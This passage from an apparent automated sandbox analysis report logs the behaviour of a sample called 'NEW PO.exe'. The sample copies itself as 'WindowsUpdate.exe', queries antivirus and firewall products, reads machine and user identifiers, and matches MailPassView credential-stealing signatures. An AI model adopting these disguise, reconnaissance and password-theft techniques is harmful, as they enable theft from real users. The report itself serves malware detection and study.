Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Users\user\Desktop\NEW PO.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Queries volume information: C:\Users\user\AppData\Roaming\WindowsUpdate.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Queries volume information: C:\Users\user\AppData\Roaming\WindowsUpdate.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Queries volume information: C:\Users\user\AppData\Roaming\WindowsUpdate.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Queries volume information: C:\Users\user\AppData\Roaming\WindowsUpdate.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation

Source: C:\Users\user\Desktop\NEW PO.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 10_2_0041604B GetSystemTime,memcpy,GetCurrentProcessId,memcpy,GetTickCount,memcpy,QueryPerformanceCounter,memcpy,

10_2_0041604B

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 11_2_0040724C memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,

11_2_0040724C

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 10_2_00407674 GetVersionExW,

10_2_00407674

Source: C:\Users\user\Desktop\NEW PO.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\Desktop\NEW PO.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

Source: NEW PO.exe, 00000007.00000000.312477071.0000000000ED0000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000012.00000000.394809421.0000000007A70000.00000004.00000001.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: NEW PO.exe, 00000007.00000000.319830078.00000000072C0000.00000004.00000001.sdmp	Binary or memory string: Defender\MsMpeng.exe

Stealing of Sensitive Information:

Yara detected MailPassView

Show sources

Source: Yara match	File source: 7.0.NEW PO.exe.45fa72.29.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.45fa72.22.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.45fa72.19.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.409c0d.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.45fa72.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.42d9930.33.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.45fa72.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.45fa72.17.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.45fa72.40.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.408208.17.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.45fa72.17.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.408208.40.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.408208.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.409c0d.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.45fa72.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.45fa72.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.45fa72.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.400000.21.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.409c0d.39.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.WindowsUpdate.exe.42d9930.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.409c0d.27.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.409c0d.22.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.NEW PO.exe.409c0d.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.45fa72.23.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.409c0d.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.408208.23.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.400000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.WindowsUpdate.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.WindowsUpdate.exe.45fa72.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.45fa72.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.45fa72.23.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.WindowsUpdate.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.408208.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.400000.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.NEW PO.exe.474fbd0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.45fa72.22.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.45fa72.38.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.0.vbc.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.WindowsUpdate.exe.408208.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.45fa72.40.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.45fa72.24.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.WindowsUpdate.exe.409c0d.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.3aa9930.46.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.WindowsUpdate.exe.409c0d.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.3aa9930.46.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.45fa72.29.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.409c0d.19.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.WindowsUpdate.exe.45fa72.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.WindowsUpdate.exe.42d9930.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.409c0d.23.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.WindowsUpdate.exe.408208.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.vbc.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.409c0d.39.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.45fa72.38.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.409c0d.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.400000.16.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.400000.38.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.400000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.409c0d.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.WindowsUpdate.exe.459fbd0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.NEW PO.exe.3aa9930.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.42d9930.33.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.408208.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.408208.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.45fa72.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.45fa72.19.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.NEW PO.exe.408208.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.WindowsUpdate.exe.408208.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.WindowsUpdate.exe.42d9930.45.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.45fa72.24.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.NEW PO.exe.408208.28.raw.unpack, type: UNPACKEDPE
